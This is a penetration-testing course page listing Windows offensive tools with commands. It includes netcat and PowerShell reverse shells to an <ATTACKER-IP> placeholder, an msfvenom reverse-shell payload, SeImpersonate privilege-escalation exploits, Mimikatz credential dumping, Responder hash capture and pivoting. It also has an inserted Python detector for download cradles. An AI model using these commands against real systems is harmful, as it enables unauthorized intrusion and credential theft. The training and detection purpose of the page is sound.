16 - Useful Tools
Why Do We Use Tools?
In the field of cybersecurity, tools play a crucial role in automating repetitive, complex, or otherwise resource-intensive tasks. They help professionals save time and effort, which are often limited during assessments or incidents. A good tool should:
Clearly define its purpose and scope.
Be simple to use relative to its functionality.
Integrate seamlessly into automation workflows.
Provide concise and clear output.
Remain minimalistic, avoiding unnecessary features.
Be well-documented and, if possible, modifiable for specific needs.
Why Mindset Matters
While tools are powerful, understanding the underlying concepts they automate remains essential. This knowledge ensures that you can:
Customize tools to your needs.
Develop solutions in environments where tools are unavailable.
Mitigate tool-related detection by defenders during offensive operations.
The best tool is always a well-trained mind.
Useful Tools (Windows)
Certutil
Built-in Windows utility often used for certificate management. It can also download files:
certutil -urlcache -split -f <URL> <OUTPUT-FILE>
certutil -urlcache -split -f https://example.com/file.txt file.txt
Invoke-WebRequest (iwr)
PowerShell cmdlet to download files:
iwr -uri <URL> -OutFile <OUTPUT-FILE>
iwr -uri https://example.com/file.txt -OutFile file.txt
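Both certutil and Invoke-WebRequest are built-in binaries, so on the defensive side their download syntax is what stands out in process-creation telemetry. The following Python snippet is an added example and not part of this course page; it runs two simple command-line rules over a handful of constructed, Sysmon-style process events (the event fields, PIDs and rule names are hypothetical) and returns the events that look like the download cradles shown above.

```python
import re

# Constructed sample process-creation events (hypothetical; loosely modelled on
# Sysmon Event ID 1 fields, not real telemetry). Two of them reproduce the
# download commands from the cheat sheet, the rest are benign look-alikes.
SAMPLE_EVENTS = [
    {"pid": 4021, "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil -urlcache -split -f https://example.com/file.txt file.txt"},
    {"pid": 4022, "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil -verify server.cer"},
    {"pid": 4023, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell iwr -uri https://example.com/file.txt -OutFile file.txt"},
    {"pid": 4024, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell Invoke-WebRequest -Uri https://intranet/status"},
    {"pid": 4025, "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe notes.txt"},
]

# Each rule is a name plus a list of regexes that must ALL match the command
# line (case-insensitive), so argument order does not matter. Rule names are
# hypothetical, chosen for this example.
DOWNLOAD_CRADLE_RULES = [
    ("certutil_urlcache_download", [
        re.compile(r"\bcertutil(\.exe)?\b", re.I),
        re.compile(r"-urlcache\b", re.I),
        re.compile(r"-f\b", re.I),
        re.compile(r"https?://", re.I),
    ]),
    ("powershell_iwr_outfile", [
        re.compile(r"\b(iwr|invoke-webrequest)\b", re.I),
        re.compile(r"-outfile\b", re.I),
        re.compile(r"https?://", re.I),
    ]),
]


def detect_download_cradles(events):
    """Return one hit dict per (event, rule) pair where every regex of the rule
    matches the event's command line. Events without a cmdline are skipped."""
    hits = []
    for ev in events:
        cmdline = ev.get("cmdline") or ""
        for name, patterns in DOWNLOAD_CRADLE_RULES:
            if all(p.search(cmdline) for p in patterns):
                hits.append({"pid": ev["pid"], "rule": name, "cmdline": cmdline})
    return hits


if __name__ == "__main__":
    for hit in detect_download_cradles(SAMPLE_EVENTS):
        print(f"[{hit['rule']}] pid={hit['pid']} {hit['cmdline']}")
```

Only the two cradle-style invocations are flagged; `certutil -verify` and a plain `Invoke-WebRequest` without `-OutFile` pass through, which is the point of requiring every fragment of a rule rather than the binary name alone.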
Netcat (nc)
A versatile networking tool for creating reverse shells, listening on ports, and transferring files. Example for a reverse shell:
iwr -uri https://raw.githubusercontent.com/int0x33/nc.exe/master/nc64.exe -Outfile netcat64.exe
nc -lvnp 4321 (listener)
.\netcat64.exe <ATTACKER-IP> 4321 -e cmd.exe (on target)
Invoke-PowerShellTcp
A PowerShell reverse shell script:
iwr -uri https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1 -Outfile Invoke-PowerShellTcp.ps1
. .\Invoke-PowerShellTcp
Invoke-PowerShellTcp -Reverse -IPAddress <ATTACKER-IP> -Port <PORT>
Msfvenom
Tool for generating payloads. Example for a reverse shell:
msfvenom -p windows/shell_reverse_tcp LHOST=<ATTACKER-IP> LPORT=<PORT> -f exe -o malicious.exe
MinGW32
A cross-compiler for building Windows binaries from Linux. Example of building a basic program:
#include <stdio.h>
int main() { printf("Hello World!\n"); return 0; }
Compile using:
x86_64-w64-mingw32-gcc -o hello.exe hello.c
PrintSpoofer
Exploit for abusing the SeImpersonatePrivilege:
iwr -uri "https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe" -Outfile PrintSpoofer64.exe
.\PrintSpoofer64.exe -c "cmd.exe"
GodPotato
Similar to PrintSpoofer, used for exploiting SeImpersonatePrivilege:
iwr -uri "https://github.com/BeichenDream/GodPotato/releases/download/V1.20/GodPotato-NET2.exe" -Outfile GodPotato-NET2.exe
.\GodPotato-NET2.exe -cmd "cmd.exe"
WinPEAS
Windows Privilege Escalation Awesome Script:
iwr -uri https://github.com/peass-ng/PEASS-ng/releases/download/20241205-c8c0c3e5/winPEASx64.exe -Outfile winPEASx64.exe
.\winPEASx64.exe quiet
PowerUp
PowerShell script for auditing common privilege escalation vectors:
iwr -uri https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1 -Outfile PowerUp.ps1
Import-Module .\PowerUp.ps1
Invoke-PrivescAudit -HTMLReport
PrivescCheck
Identifies misconfigurations leading to privilege escalation:
iwr -uri "https://raw.githubusercontent.com/itm4n/PrivescCheck/master/release/PrivescCheck.ps1" -Outfile PrivescCheck.ps1
powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck -Extended"
BeRoot
Post-exploitation script for privilege escalation checks:
iwr -uri "https://github.com/AlessandroZ/BeRoot/releases/download/1.0.1/beRoot.zip" -Outfile beRoot.zip
Expand-Archive beRoot.zip -DestinationPath .
.\beRoot.exe
Mimikatz
Advanced credential-dumping tool:
iwr -uri "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20220919/mimikatz_trunk.zip" -Outfile mimikatz_trunk.zip
Expand-Archive mimikatz_trunk.zip -DestinationPath .
.\x64\mimikatz.exe
Impacket
Python library for working with Windows protocols:
pip install impacket
impacket-smbclient <TARGET-IP>
Responder
Poisoning tool for capturing hashes:
git clone https://github.com/lgandx/Responder
cd Responder
sudo python3 Responder.py -I <INTERFACE>
Chisel
TCP/UDP tunneling tool for pivoting:
chisel server -p 8080 --reverse (on attacker)
chisel client <SERVER-IP>:8080 R:1080:127.0.0.1:80 (on pivot host)
Hashcat and John the Ripper
Tools for cracking passwords and hashes:
hashcat -m 1000 -a 0 hash.txt rockyou.txt
john --format=nt --wordlist=rockyou.txt hash.txt
CrackMapExec
Network exploitation and post-exploitation framework:
crackmapexec smb <TARGET-IP>
Disclaimer
❗ Never use tools and techniques on real IP addresses, hosts or networks without proper authorization!❗